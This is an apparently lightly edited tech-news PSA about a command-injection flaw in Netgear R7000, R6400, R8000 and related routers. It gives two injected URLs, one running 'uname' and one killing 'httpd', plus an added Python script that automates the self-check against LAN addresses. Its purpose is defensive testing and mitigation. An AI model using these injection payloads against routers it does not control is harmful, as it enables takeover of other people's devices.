
PSA: Several Netgear Routers Have an Easily Exploitable Security Vulnerability, Here's How to Test Yours


Netgear has confirmed that several of its routers, including the R7000, R6400, and R8000, have a security issue that could allow someone to take control of your router if you click a malicious URL.

The affected routers include several of Netgear’s most popular models, including the “Nighthawk” series. Netgear has only confirmed three models, but others are suggesting the R7500, R7800, R8500, and the R9000 are all also affected. Netgear is working on a patch to correct this, but until there’s an official solution, you can check yours for vulnerabilities and shore it up yourself. Data scientist Bas van Schaik has the details:

  1. Check your router for a vulnerability by going to http://[router-address]/cgi-bin/;uname$IFS-a in your browser (replacing [router-address] with your router’s IP address). If that page shows anything but an error or an empty page, your router is affected.

  2. If it is affected, you can terminate the web server process that’s exploitable. However, this will kill the web configuration interface on your router until you reboot it. This shouldn’t be a big deal unless you go into your router’s management tool often. If you’re okay with that, type this into your browser’s URL: http://[router-address]/cgi-bin/;killall$IFS'httpd' and then head back to the URL in step one to verify it worked.

If you restart your router, the vulnerability will be open again, but at least it’s a temporary fix until Netgear releases an official patch. The only way someone could exploit this is if they sent you a malicious link and you clicked that link, which is pretty unlikely, but if you have one of these routers, it’s still probably better to be safe than sorry.
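
The check from step 1 can also be scripted. The following is an added example, not code from the original article or from Netgear: it builds the step-1 URL, applies the article's rule (anything but an error or an empty page means affected), and reports a refused or timed-out connection separately, since that is what a router looks like after step 2. The function names and the restriction to private LAN addresses are assumptions of this example.

```python
import ipaddress
import sys
import urllib.error
import urllib.request

# Path from step 1 of the article: asks the router's web server to run `uname -a`.
CHECK_PATH = "/cgi-bin/;uname$IFS-a"


def check_url(router_address):
    """Build the step-1 URL; accept only private (LAN) IP addresses."""
    ip = ipaddress.ip_address(router_address)  # ValueError for hostnames/typos
    if not ip.is_private:
        raise ValueError("refusing to query a non-private address")
    host = f"[{ip}]" if ip.version == 6 else str(ip)
    return f"http://{host}{CHECK_PATH}"


def classify(status, body):
    """Article's rule: anything but an error or an empty page means affected."""
    if status is None:
        return "no response"  # wrong address, or httpd already stopped (step 2)
    if status >= 400:
        return "not affected (error page)"
    if not body.strip():
        return "not affected (empty page)"
    return "affected"


def check_router(router_address, timeout=5):
    """Fetch the check URL once and classify what came back."""
    url = check_url(router_address)
    try:
        with urllib.request.urlopen(url, timeout=timeout) as resp:
            return classify(resp.status, resp.read().decode("latin-1"))
    except urllib.error.HTTPError as err:
        return classify(err.code, "")
    except OSError:  # URLError, refused connection, timeout
        return classify(None, "")


if __name__ == "__main__":
    # Constructed sample responses (not captured from a real router).
    for status, body in [(200, "Linux router 2.6.36 armv7l\n"), (404, "Not Found"),
                         (200, ""), (None, "")]:
        print(status, repr(body), "->", classify(status, body))
    if len(sys.argv) > 1:
        print(sys.argv[1], "->", check_router(sys.argv[1]))
```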

Update: Netgear’s released a beta firmware for the R7000 and the rest of their line if you don’t mind taking the beta route (thanks for pointing this out, Fritzo).

Stop using Netgear routers with unpatched security bug, experts warn | Ars Technica